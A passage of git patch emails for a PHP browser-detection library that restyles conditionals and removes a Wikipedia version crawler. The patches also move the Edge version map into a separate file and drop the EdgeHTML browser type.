'39.14959', + '15.14965' => '39.14965', + '15.14971' => '39.14971', + '15.14977' => '39.14977', + '15.14986' => '39.14986', '15.15002' => '39.15002', '15.15007' => '39.15007', '15.15019' => '40.15019', From f567a240093bcdf78198119ed52fdbb376c862a7 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Wed, 12 Apr 2017 09:05:08 -0400 Subject: [PATCH 17/19] Fixed styling --- scripts/fetchEdgeVersions/ChangeWindows.php | 40 +++++++++++++++------ scripts/fetchEdgeVersions/Wikipedia.php | 24 +++++++++---- src/BrowserDetector.php | 14 +++----- 3 files changed, 52 insertions(+), 26 deletions(-) diff --git a/scripts/fetchEdgeVersions/ChangeWindows.php b/scripts/fetchEdgeVersions/ChangeWindows.php index 6f43cdc..864e592 100644 --- a/scripts/fetchEdgeVersions/ChangeWindows.php +++ b/scripts/fetchEdgeVersions/ChangeWindows.php @@ -21,7 +21,9 @@ public static function fetchVersions() $windowsVersions = json_decode(file_get_contents(__DIR__ . '/windowsVersions.json'), true); if (!count($windowsVersions)) { $currentVersion = explode('.', self::fetchCurrentVersion(), 2); - if (!isset($currentVersion[0])) throw new Exception(self::$errors['invalid_version']); + if (!isset($currentVersion[0])) { + throw new Exception(self::$errors['invalid_version']); + } $windowsVersions = self::fetchVersion($windowsVersions, $currentVersion[0]); self::writeWindowsVersions($windowsVersions); } else { @@ -67,13 +69,21 @@ private static function writeWindowsVersions($windowsVersions) private static function fetchCurrentVersion() { $content = file_get_contents('https://changewindows.org/filter/pc/all/current/month/true'); - if (!$content) throw new Exception(self::$errors['could_not_fetch_version']); + if (!$content) { + throw new Exception(self::$errors['could_not_fetch_version']); + } $content = explode('class="timeline"', $content, 2); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + if (!isset($content[1])) { + throw new 
Exception(self::$errors['could_not_fetch_version']); + } $content = explode('build"', $content[1], 2); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } preg_match("/(\d*\.\d*)<\/div>/", $content[1], $matches); - if (!isset($matches[1])) throw new Exception(self::$errors['could_not_fetch_version']); + if (!isset($matches[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } return $matches[1]; } @@ -122,15 +132,25 @@ private static function writeEdgeVersion($edgeHtml, $edge) private static function fetchSiblingVersions($content) { - if (!$content) throw new Exception(self::$errors['could_not_fetch_page']); + if (!$content) { + throw new Exception(self::$errors['could_not_fetch_page']); + } $content = explode('build-sidebar', $content, 2); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_page']); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_page']); + } $content = explode('fa-angle-left', $content[1]); - if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_page']); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_page']); + } $content = explode('fa-angle-right', $content[1]); - if (!isset($content[0])) throw new Exception(self::$errors['could_not_fetch_page']); + if (!isset($content[0])) { + throw new Exception(self::$errors['could_not_fetch_page']); + } preg_match_all("/> *(\d+) *1) - { - if (isset(self::$edgeHTML[$matches[1]])) - { + if (sizeof($matches)>1) { + if (isset(self::$edgeHTML[$matches[1]])) { self::$browser->setName(Browser::EDGE); self::$browser->setVersion(self::$edgeHTML[$matches[1]]); - } - else - { + } else { self::$browser->setName(Browser::EDGE_HTML); self::$browser->setVersion($matches[1]); } - } - else - { + } else { self::$browser->setName(Browser::EDGE); } From 
aa31357583f76538e406cc2f21beb0a0d6543b6d Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Thu, 20 Apr 2017 11:26:27 -0400 Subject: [PATCH 18/19] Removed wikipedia crawling --- scripts/fetchEdgeVersions/Wikipedia.php | 77 ------------------------- scripts/fetchEdgeVersions/index.php | 3 - 2 files changed, 80 deletions(-) delete mode 100644 scripts/fetchEdgeVersions/Wikipedia.php diff --git a/scripts/fetchEdgeVersions/Wikipedia.php b/scripts/fetchEdgeVersions/Wikipedia.php deleted file mode 100644 index bd2bda1..0000000 --- a/scripts/fetchEdgeVersions/Wikipedia.php +++ /dev/null @@ -1,77 +0,0 @@ - 'Unable to fetch content', - 'parse_error' => 'Unable to parse content', - ); - - public static function fetch() - { - $content = file_get_contents(self::URL); - if (!$content) { - throw new Exception(self::$errors['fetch_error']); - } - $content = explode('===Release history===', $content); - if (!isset($content[1])) { - throw new Exception(self::$errors['parse_error']); - } - $table = explode('|-', $content[1]); - if (!isset($table[1])) { - throw new Exception(self::$errors['parse_error']); - } - $table = array_slice($table, 1); - $versions = array_map(array('Wikipedia', 'extractVersion'), $table); - self::writeEdgeVersions($versions); - } - - private static function extractVersion($content) - { - $lines = array_slice(array_filter( - explode(PHP_EOL, $content), - function ($val) { - return trim($val) && strpos($val, '|') === 0; - } - ), 0, 2); - - preg_match("/{[^}{]*Version[^}{]*\| ?([\d\.]+)}/", $lines[0], $edgeVersion); - preg_match("/\| *(\d*\.\d*)/", $lines[1], $edgeHtmlVersion); - - if (!isset($edgeVersion[1])) { - throw new Exception(self::$errors['parse_error']); - } - if (!isset($edgeHtmlVersion[1])) { - throw new Exception(self::$errors['parse_error']); - } - - return array($edgeHtmlVersion[1], $edgeVersion[1]); - } - - private static function writeEdgeVersions($versions) - { - $file = __DIR__ . 
'/../../src/edgeVersionMap.php'; - $currentVersions = require $file; - - foreach ($versions as $version) { - $currentVersions[$version[0]] = $version[1]; - } - ksort($currentVersions); - - $content = ''; - foreach ($currentVersions as $edgeHtml => $edge) { - $content .= " '{$edgeHtml}' => '{$edge}'," . PHP_EOL; - } - $data = << Date: Thu, 20 Apr 2017 11:41:45 -0400 Subject: [PATCH 19/19] Removed Edge HTML browser --- .../fetchEdgeVersions/windowsVersions.json | 6 +- src/Browser.php | 1 - src/BrowserDetector.php | 88 ++++--------------- .../Tests/_files/UserAgentStrings.xml | 4 +- .../Tests/_includes/UserAgentString.php | 18 ++-- 5 files changed, 32 insertions(+), 85 deletions(-) diff --git a/scripts/fetchEdgeVersions/windowsVersions.json b/scripts/fetchEdgeVersions/windowsVersions.json index f5710a1..f0f0865 100644 --- a/scripts/fetchEdgeVersions/windowsVersions.json +++ b/scripts/fetchEdgeVersions/windowsVersions.json @@ -25,5 +25,9 @@ "15061": true, "15062": true, "15063": true, - "16170": true + "15204": true, + "15205": true, + "16170": true, + "16176": true, + "16179": true } \ No newline at end of file diff --git a/src/Browser.php b/src/Browser.php index 0ba35ec..3ae4d23 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -38,7 +38,6 @@ class Browser const GSA = 'Google Search Appliance'; const YANDEX = 'Yandex'; const EDGE = 'Edge'; - const EDGE_HTML = 'EdgeHTML'; const DRAGON = 'Dragon'; const NSPLAYER = 'Windows Media Player'; const UCBROWSER = 'UC Browser'; diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index f16b61e..4b01f79 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -7,6 +7,7 @@ class BrowserDetector implements DetectorInterface const FUNC_PREFIX = 'checkBrowser'; protected static $userAgentString; + protected static $edgeVersionsMap = null; /** * @var Browser @@ -71,71 +72,14 @@ class BrowserDetector implements DetectorInterface 'Mozilla', /* Mozilla is such an open standard that you must check it last */ ); 
- //https://en.wikipedia.org/wiki/Microsoft_Edge - protected static $edgeHTML = [ - "12.10049" => "0.10.10049", - "12.10051" => "0.11.10051", - "12.10052" => "0.11.10052", - "12.10061" => "0.11.10061", - "12.10074" => "0.11.10074", - "12.1008" => "0.11.10080", - "12.10122" => "13.10122", - "12.1013" => "15.1013", - "12.10136" => "16.10136", - "12.10149" => "19.10149", - "12.10158" => "20.10158", - "12.10159" => "20.10159", - "12.10162" => "20.10162", - "12.10166" => "20.10166", - "12.1024" => "20.1024", - "12.10512" => "20.10512", - "12.10514" => "20.10514", - "12.10525" => "20.10525", - "12.10532" => "20.10532", - "12.10536" => "20.10536", - "13.10547" => "21.10547", - "13.10549" => "21.10549", - "13.10565" => "23.10565", - "13.10572" => "25.10572", - "13.10576" => "25.10576", - "13.10581" => "25.10581", - "13.10586" => "25.10586", - "13.11082" => "25.11082", - "13.11099" => "27.11099", - "13.11102" => "28.11102", - "13.14251" => "28.14251", - "13.14257" => "28.14257", - "14.14267" => "31.14267", - "14.14271" => "31.14271", - "14.14279" => "31.14279", - "14.14283" => "31.14283", - "14.14291" => "34.14291", - "14.14295" => "34.14295", - "14.143" => "34.143", - "14.14316" => "37.14316", - "14.14322" => "37.14322", - "14.14327" => "37.14327", - "14.14328" => "37.14328", - "14.14332" => "37.14332", - "14.14342" => "38.14342", - "14.14352" => "38.14352", - "14.14393" => "38.14393", - "14.14901" => "39.14901", - "14.14905" => "39.14905", - "14.14915" => "39.14915", - "14.14926" => "39.14926", - "14.14931" => "39.14931", - "14.14936" => "39.14936", - "15.14942" => "39.14942", - "15.14946" => "39.14946", - "15.14951" => "39.14951", - "15.14955" => "39.14955", - "15.14959" => "39.14959", - "15.14965" => "39.14965", - "15.14971" => "39.14971", - "15.14977" => "39.14977", - "15.14986" => "39.14986" - ]; + /** + * @return array + */ + public static function getEdgeVersionsMap() + { + if (self::$edgeVersionsMap) return self::$edgeVersionsMap; + return self::$edgeVersionsMap = 
require __DIR__ . '/edgeVersionMap.php'; + } /** * Routine to determine the browser type. @@ -537,17 +481,15 @@ public static function checkBrowserVivaldi() public static function checkBrowserEdge() { if (stripos(self::$userAgentString, 'Edge') !== false) { + self::$browser->setName(Browser::EDGE); preg_match('/Edge[\\/ \\(]([a-zA-Z\\d\\.]*)/i', self::$userAgentString, $matches); if (sizeof($matches)>1) { - if (isset(self::$edgeHTML[$matches[1]])) { - self::$browser->setName(Browser::EDGE); - self::$browser->setVersion(self::$edgeHTML[$matches[1]]); - } else { - self::$browser->setName(Browser::EDGE_HTML); - self::$browser->setVersion($matches[1]); + // todo: implement edge html version + $edgeVersionsMap = self::getEdgeVersionsMap(); + // todo: match versions in between + if (isset($edgeVersionsMap[$matches[1]])) { + self::$browser->setVersion($edgeVersionsMap[$matches[1]]); } - } else { - self::$browser->setName(Browser::EDGE); } return true; diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index a342b23..d0b2d77 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -284,8 +284,8 @@ - EdgeHTML - 12.00049 + Edge + unknown Windows Phone 10 Lumia 640 LTE diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 4bdcfc3..90e898d 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -4,35 +4,37 @@ class UserAgentString { + const UNKNOWN = 'unknown'; + /** * @var string */ - private $browser; + private $browser = self::UNKNOWN; /** * @var string */ - private $browserVersion; + private $browserVersion = self::UNKNOWN; /** * @var string */ - private $os; + private $os = self::UNKNOWN; /** * @var string */ - private $osVersion; + private $osVersion = 
self::UNKNOWN; /** * @var string */ - private $device; + private $device = self::UNKNOWN; /** * @var string */ - private $deviceVersion; + private $deviceVersion = self::UNKNOWN; /** * @var string @@ -42,12 +44,12 @@ class UserAgentString /** * @var string */ - private $scriptedAgent; + private $scriptedAgent = self::UNKNOWN; /** * @var string */ - private $scriptedAgentType; + private $scriptedAgentType = self::UNKNOWN; /** * @return string